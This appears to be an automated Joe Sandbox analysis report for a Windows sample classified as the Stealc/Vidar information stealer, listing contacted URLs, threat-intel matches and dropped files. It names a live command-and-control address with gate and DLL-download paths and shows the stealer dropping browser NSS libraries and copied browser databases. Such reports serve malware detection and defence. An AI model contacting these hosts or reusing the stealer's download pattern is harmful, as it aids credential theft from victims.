http://185.215.113.37/0d60be0de163924d/softokn3.dll~	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllz	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37e2b1563c6670f193.phpox	file.exe, 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllm	file.exe, 00000000.00000002.1753853572.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll$	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	DAKFIDHDGIEGCAKFIIJK.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	BFHIJEBKEBGHIDHJKJEGCBAEGH.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpB_9)	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php24	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000002.1753853572.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, CGDHIEGC.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/1b	file.exe, 00000000.00000002.1753853572.0000000000F61000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519332
Start date and time:	2024-09-26 11:32:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 101
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	wkoozurOWo.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	86aY1jzemK.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	185.215.113.117
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	SecuriteInfo.com.Win32.TrojanX-gen.27580.21343.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	yKdUWqd0Gs.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	7l2s6qwHg7.exe	Get hash	malicious	RedLine	Browse	185.215.113.9
	nZ0aiGjW9V.exe	Get hash	malicious	Stealc	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AEGHJEGIEBFIJJKFIIIJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BFHIJEBKEBGHIDHJKJEGCBAEGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CGDHIEGC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAKFIDHDGIEGCAKFIIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9526
Entropy (8bit):	5.515924904533179
Encrypted:	false
SSDEEP:	192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
MD5:	4580799F1DC5720A7EC1766400E98740
SHA1:	92FD30F47EC545245B934EA492B3C64D5E609AA9
SHA-256:	57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
SHA-512:	C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DBFBFBGDBKJJKFIEHJDB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJDHCFCBGIDGHJJKJJDGHDGDHI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDBGHDGHCGHCAAKFIIECFHCFBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8467337400211222
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
MD5:	7A03CC0EAD0AEFF210C3E60823AAA5EC
SHA1:	8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
SHA-256:	D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
SHA-512:	8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGDAKEH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGDAKEHJDHIDHJJDAECFBKFHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
